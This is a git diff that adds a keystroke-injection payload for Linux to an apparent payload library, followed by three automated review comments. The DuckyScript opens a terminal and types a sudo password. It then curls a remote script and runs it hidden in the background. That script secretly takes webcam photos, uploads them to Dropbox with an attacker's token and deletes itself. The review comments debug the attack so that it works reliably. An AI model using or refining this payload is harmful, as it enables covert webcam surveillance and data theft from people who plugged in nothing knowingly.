diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md new file mode 100644 index 0000000..f952878 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md @@ -0,0 +1,56 @@ +# Exfiltrate Photos Through Shell - Linux ✅ + +A script used to exfiltrate photos using fswebcam shell command. + +**Category**: Exfiltration + +## Description + +A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded. + +## Getting Started + +### Dependencies + +* An internet connection +* Linux system +* Dropbox Token, or whatever you want, for the exfiltration +* sudo permission +* 'fswebcam' installed but you can install it with the payload + +### Executing program + +* Plug in your device + +### Settings + +* Dropbox Token - You should change it into the script.sh file, line 7. + +```Python +TOKEN=your_dropbox_token +``` + +* This section of sudo time depends by the computer power on which it runs. So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is (so 5000) set now or smaller depending on your needs. + +```DuckyScript +STRING SUDO-PSWD +ENTER +REM DELAY Based On Computer Power +DELAY 5000 +``` + +* If you want to install the fswebcam dependency, you should uncomment it. This DELAY (so 5000), like the previous one, is dynamic and in this case relies on the power of the Internet. + +```DuckyScript +REM STRING apt install fswebcam -y +REM ENTER +REM DELAY Based On Internet Power +REM DELAY 5000 +``` + +* Generally does not need much time + +```DuckyScript +REM DELAY Based On Internet Power +DELAY 4000 +``` 
diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt new file mode 100644 index 0000000..c6b01e8 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt @@ -0,0 +1,52 @@ +REM ################################################## +REM # | +REM # Title : Exfiltrate Photos Through Shell | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Linux | +REM # | +REM ################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..) +REM - sudo permissions +REM - if you need to install 'fswebcam' +REM - for add the -x permission to the script.sh downloaded + +REM REQUIRED - replace example.com with your script.sh link +DEFINE SCRIPT-SH-LINK example.com + +REM REQUIRED - sudo Password +DEFINE SUDO-PSWD example + +DELAY 1000 +CTRL ALT t +DELAY 2000 + +REM #### Permission #### +REM This section of sudo time depends by the computer power on which it runs. +REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs. + +STRINGLN sudo su +DELAY 500 +STRINGLN SUDO-PSWD +REM DELAY Based On Computer Power +DELAY 5000 + +REM If you want to install the dependency of fswebcam you should decommend it. +REM STRING apt install fswebcam -y +REM ENTER +REM DELAY Based On Internet Power +REM DELAY 5000 + +REM #### Script #### +STRINGLN curl #SCRIPT-SH-LINK > script.sh +REM DELAY Based On Internet Power +DELAY 4000 + +STRINGLN chmod +x script.sh +DELAY 500 + +STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit 
diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh new file mode 100644 index 0000000..65c7ab7 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh @@ -0,0 +1,32 @@ +#!/bin/bash + +USER=$(whoami) + +DIR=/home/$USER/tmp + +TOKEN=your_dropbox_token + +mkdir -p $DIR + +function remove_folder { + rm -rf "$DIR" + rm -rf "/home/$USER/script.sh" +} + +trap remove_folder EXIT + +# execute the for, for some times.. +for i in {1..10} +do + NAME=$(date +%s%N).jpg + + fswebcam --no-banner $DIR/$NAME + + curl -X POST https://content.dropboxapi.com/2/files/upload \ + --header "Authorization: Bearer $TOKEN" \ + --header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \ + --header "Content-Type: application/octet-stream" \ + --data-binary @$DIR/$NAME + + sleep 60 +done
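Review bot: In the README hunk, the `TOKEN=your_dropbox_token` snippet is fenced as ```Python although it is a bash assignment copied from script.sh; tag it ```bash so syntax highlighting and any fence-based tooling treat it correctly. The Description paragraph repeats the tagline verbatim and then reads "The permissions is needed for give the executation permission to the script downloaded"; rewrite as "sudo is needed to install fswebcam and to give the downloaded script execute permission" (note that `chmod +x` on the user's own download does not actually require sudo, so the sentence should say which step needs it). The sudo-delay bullet is hard to parse ("otherwise you can try running it as it is (so 5000) set now or smaller"); say "leave the default of 5000 ms, or lower it on a fast machine". The README should also state the run time: script.sh loops 10 times with `sleep 60`, so the capture phase lasts roughly ten minutes.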
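Review bot: In the payload.txt hunk, the constant name is inconsistent: `DEFINE SCRIPT-SH-LINK example.com` defines the name without a `#`, but the download line uses `STRINGLN curl #SCRIPT-SH-LINK > script.sh`, while `SUDO-PSWD` is used without one. If DEFINE substitutes the bare name, the line becomes `curl #example.com > script.sh`; bash treats a word starting with `#` as a comment, so curl runs with no URL and `script.sh` is created empty, after which `chmod +x` and `nohup ./script.sh` proceed on an empty file. Use the same spelling in both places (either `DEFINE #SCRIPT-SH-LINK` or `STRINGLN curl SCRIPT-SH-LINK`), and consider `curl -f` so a failed download does not leave a zero-byte script. Comment wording: "decommend it" should be "uncomment it", "depends by the computer power" should be "depends on the computer's speed", and "for add the -x permission to the script.sh downloaded" should be "to add execute permission to the downloaded script.sh" (and, as in the README, that step does not need sudo).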
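Review bot: In the script.sh hunk, `USER=$(whoami)` runs after payload.txt has already executed `sudo su`, so it evaluates to `root` and `DIR=/home/$USER/tmp` becomes `/home/root/tmp`, a path that normally does not exist because root's home is `/root`; `mkdir -p` will create it but the cleanup then leaves a stray directory under `/home`. The `remove_folder` trap has the same problem and additionally removes `/home/$USER/script.sh`, whereas payload.txt wrote `script.sh` into the shell's current directory, so the script never deletes itself. Use `"$HOME"` (or `mktemp -d`) for the work directory and `"$0"` for the script's own path, and quote `"$DIR/$NAME"` in both the `fswebcam` call and `--data-binary @"$DIR/$NAME"`. Neither the `fswebcam` nor the `curl` exit status is checked, so a missing camera or a rejected token still sleeps 60 s per iteration for all ten rounds; test `fswebcam ... || continue` and `curl -f` so failures are visible. Reassigning the standard `USER` environment variable is also worth avoiding; a lower-case local name is clearer.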